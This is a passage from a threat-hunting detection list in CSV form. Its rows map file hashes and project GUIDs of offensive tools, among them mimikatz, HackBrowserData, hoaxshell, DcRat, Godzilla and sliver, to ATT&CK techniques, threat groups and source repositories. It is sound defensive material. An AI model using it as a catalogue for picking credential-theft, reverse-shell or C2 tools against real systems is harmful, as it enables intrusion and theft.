Evasion","https://github.com/RythmStick/AMSITrigger","1","0","#GUIDproject","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","30692" "*8bacee16a0e720e6a97e27f340ae68ab356828d06eabc6369119e52ca428f6c1*",".{0,1000}8bacee16a0e720e6a97e27f340ae68ab356828d06eabc6369119e52ca428f6c1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30693" "*8bb4a7173ed3c828b227597d1b59fe08410f19b5e16315cce383d76ac1d67b02*",".{0,1000}8bb4a7173ed3c828b227597d1b59fe08410f19b5e16315cce383d76ac1d67b02.{0,1000}","offensive_tool_keyword","tun2socks","socks 
tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30694" "*8bb8d1e02de80c343d03d48eb549cbf6a0a891a699c2c9e47079151817c93ff5*",".{0,1000}8bb8d1e02de80c343d03d48eb549cbf6a0a891a699c2c9e47079151817c93ff5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30695" "*8bb972b4dc7e0c5b8db0be349ecf62043e69ea1273d5298f8e55c02fa047712c*",".{0,1000}8bb972b4dc7e0c5b8db0be349ecf62043e69ea1273d5298f8e55c02fa047712c.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","30697" "*8BbApiMBHsPVKkLEP4rVbST6CnSb3LW2gXygngCi5MGiBuwAFh6bFEzT3UTufiCehFK7fNvAjs5Tv6BKYa6w8hwaSjnsg2N.*",".{0,1000}8BbApiMBHsPVKkLEP4rVbST6CnSb3LW2gXygngCi5MGiBuwAFh6bFEzT3UTufiCehFK7fNvAjs5Tv6BKYa6w8hwaSjnsg2N\..{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","30698" 
"*8bc182681dd24661db50888cc4a7faf05d3e7d79a7447af14337f14ff58d7453*",".{0,1000}8bc182681dd24661db50888cc4a7faf05d3e7d79a7447af14337f14ff58d7453.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","30700" "*8bc3958a70372ecaeba0b81e287692297974848cc2ecf053ea7ebb9dfcc933f8*",".{0,1000}8bc3958a70372ecaeba0b81e287692297974848cc2ecf053ea7ebb9dfcc933f8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30701" "*8bc3ebd6ec1b70d73eaa0b1c17ce124b4bd3fbf9d7c1de6f1f4c11e9da92eabc*",".{0,1000}8bc3ebd6ec1b70d73eaa0b1c17ce124b4bd3fbf9d7c1de6f1f4c11e9da92eabc.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","30702" 
"*8bc52fc1dbd2e9319241d826b23a227132199b37951c8222c901b6ab069c4084*",".{0,1000}8bc52fc1dbd2e9319241d826b23a227132199b37951c8222c901b6ab069c4084.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","30703" "*8bc622b1b2357145399d8b5ed0fd82bb253e4904dd6946eecc53a59fb578a1ea*",".{0,1000}8bc622b1b2357145399d8b5ed0fd82bb253e4904dd6946eecc53a59fb578a1ea.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","30704" "*8bcd2cc3874df031fb416bb9f451e2b13f146a71b0e02a7edca42c21b1d248b0*",".{0,1000}8bcd2cc3874df031fb416bb9f451e2b13f146a71b0e02a7edca42c21b1d248b0.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","30706" "*8bce6c99c0ac4b8d76c49f6e4dece996b77bb7d71d9acdbfcf5b0460811adfb9*",".{0,1000}8bce6c99c0ac4b8d76c49f6e4dece996b77bb7d71d9acdbfcf5b0460811adfb9.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral 
Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","#filehash","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","30707" "*8bcf672bb3ab901527e707e501bb399874fc6558320ecbe00d311d308c5bad89*",".{0,1000}8bcf672bb3ab901527e707e501bb399874fc6558320ecbe00d311d308c5bad89.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30708" "*8bdd98ae5c8a162a4292fe799be541c124775a34b31516789044c792ca6b4220*","","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","30710" "*8be1679cd0a2661629259d0011fe9a3bc3e7270801d97fc154577b10b85494fb*",".{0,1000}8be1679cd0a2661629259d0011fe9a3bc3e7270801d97fc154577b10b85494fb.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#filehash","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","30711" "*8be40d1c7a362d910cc8c25da987afabb4bb95fd5542c2ab043f2350b7191cab*",".{0,1000}8be40d1c7a362d910cc8c25da987afabb4bb95fd5542c2ab043f2350b7191cab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30712" 
"*8BF244EB-0CA3-403E-A076-F1D77731A728*",".{0,1000}8BF244EB\-0CA3\-403E\-A076\-F1D77731A728.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","30715" "*8bf810cf013331cf9ee984714251d0e7963b431588ab419e0b83824d8754ab67*",".{0,1000}8bf810cf013331cf9ee984714251d0e7963b431588ab419e0b83824d8754ab67.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30716" "*8BF82BBE-909C-4777-A2FC-EA7C070FF43E*",".{0,1000}8BF82BBE\-909C\-4777\-A2FC\-EA7C070FF43E.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#GUIDproject","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","30717" "*8BF82BBE-909C-4777-A2FC-EA7C070FF43E*",".{0,1000}8BF82BBE\-909C\-4777\-A2FC\-EA7C070FF43E.{0,1000}","offensive_tool_keyword","SharpMove",".NET Project for performing Authenticated Remote Execution","T1021 - T1106 - T1218","TA0002 - TA0008","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpMove","1","0","#GUIDproject","N/A","8","4","393","66","2023-02-08T23:48:54Z","2020-01-24T22:21:04Z","30718" "*8bf86bce665800caee44d5491c9bc54e9eb86d2efe6c665343f1cb679e2a6690*",".{0,1000}8bf86bce665800caee44d5491c9bc54e9eb86d2efe6c665343f1cb679e2a6690.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and 
finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","30719" "*8BFC8ED2-71CC-49DC-9020-2C8199BC27B6*",".{0,1000}8BFC8ED2\-71CC\-49DC\-9020\-2C8199BC27B6.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","30721" "*8c038621b5807a443d8bf7344f1df9defe0e8193a55efdda8b0e08d0923c3c9e*",".{0,1000}8c038621b5807a443d8bf7344f1df9defe0e8193a55efdda8b0e08d0923c3c9e.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","30724" "*8c05ab157066ba6d94b843a1eb0732371e23a2feeb2e7522d48e9d421f50ed96*",".{0,1000}8c05ab157066ba6d94b843a1eb0732371e23a2feeb2e7522d48e9d421f50ed96.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","30725" 
"*8c1007a1d0abce7187cc43079832d6b2b9510aee7c15e1eb2f322d8cc854cf3b*",".{0,1000}8c1007a1d0abce7187cc43079832d6b2b9510aee7c15e1eb2f322d8cc854cf3b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30727" "*8c18fe10b673b128e86bb6f1b6dd34eae23c4428ec66e8496d94fd04cfc17784*",".{0,1000}8c18fe10b673b128e86bb6f1b6dd34eae23c4428ec66e8496d94fd04cfc17784.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - 
menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30728" "*8c18fe10b673b128e86bb6f1b6dd34eae23c4428ec66e8496d94fd04cfc17784*",".{0,1000}8c18fe10b673b128e86bb6f1b6dd34eae23c4428ec66e8496d94fd04cfc17784.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30729" "*8c1e9d935d60c007bd43d10b206cd229c851b654562e6bb93ce009481d827afb*",".{0,1000}8c1e9d935d60c007bd43d10b206cd229c851b654562e6bb93ce009481d827afb.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30733" "*8c34fc93d2e71f3faeaa17b1507a70d87e09ec7bafd7922dff22ba887c304db5*",".{0,1000}8c34fc93d2e71f3faeaa17b1507a70d87e09ec7bafd7922dff22ba887c304db5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30736" "*8c368864f6d59eac9603c8ad0099a32a1648be13c9cf69658174db3921d6c30c*",".{0,1000}8c368864f6d59eac9603c8ad0099a32a1648be13c9cf69658174db3921d6c30c.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","30738" "*8c3c68f026da1de92c0162f38b509ee335041b7cf5f861fce1d38b053287c866*",".{0,1000}8c3c68f026da1de92c0162f38b509ee335041b7cf5f861fce1d38b053287c866.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - 
T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","30741" "*8c434e4c9fa572dd95d94193f9671e039fb8dd1705cf4c841aaa1969ce9dae2e*",".{0,1000}8c434e4c9fa572dd95d94193f9671e039fb8dd1705cf4c841aaa1969ce9dae2e.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","30744" "*8c484c384d66dd2821b9f1d4f963ae897fbf539b2ab495f3e93344635eb76f18*",".{0,1000}8c484c384d66dd2821b9f1d4f963ae897fbf539b2ab495f3e93344635eb76f18.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","30747" "*8c489222246bc16d65bb4b26ad5294a40fc314d9e99bd6feb65d6bc9f0bb7a9c*",".{0,1000}8c489222246bc16d65bb4b26ad5294a40fc314d9e99bd6feb65d6bc9f0bb7a9c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30748" "*8c4b014b68d484905681e4055a154490ad2d48b732022b35eff98ee94c4d8232*",".{0,1000}8c4b014b68d484905681e4055a154490ad2d48b732022b35eff98ee94c4d8232.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30749" "*8c56340487f6954e6379a332d5297f5c9041c5bd5167b06ee8e87f1f65901e33*",".{0,1000}8c56340487f6954e6379a332d5297f5c9041c5bd5167b06ee8e87f1f65901e33.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30752" 
"*8c6291f935445adc486c03da6169b471fc2436d5b594972b14eaeb37350aa3ef*",".{0,1000}8c6291f935445adc486c03da6169b471fc2436d5b594972b14eaeb37350aa3ef.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30754" "*8c6fb15cbc44a898922c14019dd37452cabbebaffd16823646aff4d886d5a75e*",".{0,1000}8c6fb15cbc44a898922c14019dd37452cabbebaffd16823646aff4d886d5a75e.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","30755" "*8c7137030d9653611f63d82c0dbc8354ae13a1e601bc86e94ca83fd64c28f274*",".{0,1000}8c7137030d9653611f63d82c0dbc8354ae13a1e601bc86e94ca83fd64c28f274.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30756" "*8c71bcc0680bd7c69fd58639a6748d26202caab6d639f9b92eb394e6648bce0e*",".{0,1000}8c71bcc0680bd7c69fd58639a6748d26202caab6d639f9b92eb394e6648bce0e.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat 
sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","30757" "*8c7511cc6dae84071080a37c2842782cc0635f8d32301afebdc818a392a58bc3*",".{0,1000}8c7511cc6dae84071080a37c2842782cc0635f8d32301afebdc818a392a58bc3.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","30758" "*8c763214b528d61ef64a39db9b01deb16f2a550e3f2e8fbc530fb982860f682f*",".{0,1000}8c763214b528d61ef64a39db9b01deb16f2a550e3f2e8fbc530fb982860f682f.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","30759" "*8c78f5d5b2668b66f9c306a1c1860d64489582fc757a96f6a9e9a8800f4ec11d*",".{0,1000}8c78f5d5b2668b66f9c306a1c1860d64489582fc757a96f6a9e9a8800f4ec11d.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","30761" "*8c7bda923eb22fbe0961f2bb9585ceaac8e0c447116ec87979ae44b6a2699ac1*",".{0,1000}8c7bda923eb22fbe0961f2bb9585ceaac8e0c447116ec87979ae44b6a2699ac1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 
- TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30762" "*8c7c04928a927b1763b2ed933232863cd3d7a4bcfe787425234cb8fb0d499f55*",".{0,1000}8c7c04928a927b1763b2ed933232863cd3d7a4bcfe787425234cb8fb0d499f55.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30763" "*8c7d64cec00aafa23884f1bb28337ef6ce49f2f90605800217f635526e38541d*",".{0,1000}8c7d64cec00aafa23884f1bb28337ef6ce49f2f90605800217f635526e38541d.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. 
